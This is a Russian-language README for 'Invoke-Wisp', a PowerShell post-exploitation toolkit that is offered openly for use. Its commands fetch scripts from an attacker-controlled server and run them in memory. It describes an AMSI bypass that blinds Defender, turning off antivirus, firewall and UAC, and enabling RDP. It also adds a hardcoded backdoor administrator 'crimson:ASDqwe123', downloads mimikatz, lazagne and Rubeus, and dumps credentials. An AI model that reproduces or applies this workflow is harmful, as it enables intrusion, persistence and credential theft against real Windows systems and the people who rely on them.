Оболочка инструментов Windows Post-Exploitation.

ВВЕДЕНИЕ

Краткий обзор инструмента, который автоматизирует задачи после эксплуатации.

ФУНКЦИОНАЛЬНОСТЬ

Вы должны сначала установить URL-адрес для остальных функций, а затем загрузить скрипты:

Invoke-Wisp -Url http://<your_server>
. memory_load

Убедитесь, что у вас есть права на запись в текущий каталог.

  • Система перечисления для повышения привилегий.
escalation
  • Ограбление системы после перехода к NT AUTHORITY\SYSTEM.
looting

КОД

Основные возможности программы указаны выше. Однако гораздо больше программа делает за вашей спиной. Код инструмента показан ниже. Возможно, в будущем это изменится, но основная идея останется прежней.

Invoke-Wisp

Функция устанавливает глобальную переменную URL, которая будет использоваться для загрузки.
Invoke-Wisp автоматически использует bypass_amsi, описанный ниже.

Обход_AMSI

Функция загрузки файла isma.txt отключает AMSI.dll и, следовательно, Microsoft Defender в памяти PowerShell.

Память_Загрузка

Функция загрузки и загрузки в память сценариев PowerShell. Вы можете добавить сюда свои скрипты, чтобы они загружались одной командой.

Пожалуйста, убедитесь, что вы используете точечный источник функции, когда используете ее для загрузки скрипта в глобальную область. В противном случае скрипты будут загружаться только в области функций и не будут выполняться глобально.

Эскалация

Функция загрузки и запуска в памяти PowerShell escalate.txtfile, которая выполняет ряд команд для перечисления Privilege Escalation и, в конце, напоминает пользователю о нескольких дополнительных ручных проверках.

Укрепление

Функция запущена после эскалации NT AUTHORITY\SYSTEM на этапе грабежа. Загружает и запускает файл fort.txt в памяти.

Функции:

  • Создание каталога C:/blood, в котором хранятся все загруженные инструменты.
  • Отключение антивируса и добавление C:/blood в список исключений.
  • Отключение брандмауэра и UAC.
  • Включение RDP и PS-Remoting.
  • Добавление нового пользователя crimson:ASDqwe123 в группу локальных администраторов и RDP.
  • Загрузка mimikatz, psexec, procdump, nmap, sharphound, lazagne, Rubeus и winPEAS.exe .

Мародерство

Функция сначала использует вышеупомянутый Fortification, а затем загружает и запускает в памяти PowerShell файл loot.txtfile, который выполняет ряд команд для грабежа — по сути, сбрасывает учетные данные.

ЗАКЛЮЧИТЕЛЬНЫЕ СЛОВА

Спасибо за прочтение. Надеюсь, вам понравится инструмент. Если у вас есть какие-либо предложения или вы нашли ошибку, не стесняйтесь вносить свой вклад.